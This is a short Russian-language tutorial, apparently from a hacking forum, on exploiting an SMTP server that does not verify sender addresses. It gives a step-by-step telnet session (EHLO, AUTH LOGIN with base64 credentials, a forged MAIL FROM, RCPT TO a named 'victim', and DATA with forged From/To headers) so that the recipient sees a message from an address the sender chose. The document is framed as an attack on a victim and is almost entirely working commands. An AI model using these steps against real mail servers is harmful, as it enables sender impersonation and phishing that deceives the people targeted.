Для использования уязвимости требуется знать ESMTP
протокол и иметь шифровальщик base64, например в unix-based ОС часто
встречается утилита base64. Ну, не забываем и про php-функцию.
Коннектимся на порт SMTP
telnet mail.server.ru 25
представляемся:
EHLO 123.123.123.123
- наш ip. он тоже не проверяется - можно писать любую ахинею.
AUTH LOGIN base64login
base64password
где base64login - ваш логин, закодированный в base64.
base64password - пароль в 64
далее:
MAIL FROM xaker@forum.ru
наш обратный адрес: xaker@forum.ru
RCPT TO: lamer@mail.ru
адрес жертвы: lamer@mail.ru
Далее:
DATA
после этого начинается тело письма
в теле письма пишется откуда оно пришло (повторно, кому предназначено,
в какой кодировке и т.д. и т.п.) Можно ограничиться From: и To:
To: <lamer@mail.ru>
From: < xaker@forum.ru>
Subject: hello, dude!
Где Subject - тема.
когда тело закончено пишем:
<RET>.<RET>
Жертве приходит письмо с адреса, который мы указали. А именно с xaker@forum.ru